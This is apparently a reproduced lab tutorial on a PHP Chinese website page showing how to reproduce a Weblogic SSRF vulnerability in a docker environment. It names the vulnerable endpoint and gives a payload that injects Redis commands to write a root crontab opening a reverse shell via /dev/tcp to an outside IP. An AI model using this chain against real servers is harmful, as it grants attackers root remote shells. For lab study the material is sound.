Home > Article > Operation and Maintenance > How to Reproduce Weblogic SSRF Vulnerability
How to Reproduce Weblogic SSRF Vulnerability
- 王林forward
- 2023-05-14 20:04:041342browse
1. Use docker to build an environment
Docker installation and environment building tutorial: https://www.freebuf.com/sectool/252257.html
Access port 7001
2. Vulnerability reproduction steps
1. Vulnerability page/uddiexplorer/SearchPublicRegistries.jsp
2. Check IBM.
It is found that there is a connection, so there may be ssrf.
3. Use burp suite to capture packets. Click Search
4. Modify the connection of operator parameters
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
The above is the detailed content of How to Reproduce Weblogic SSRF Vulnerability. For more information, please follow other related articles on the PHP Chinese website!
Statement:
This article is reproduced at:yisu.com. If there is any infringement, please contact admin@php.cn delete
Previous article:How to implement a mapped array without map() in JavascriptNext article:How to implement a mapped array without map() in Javascript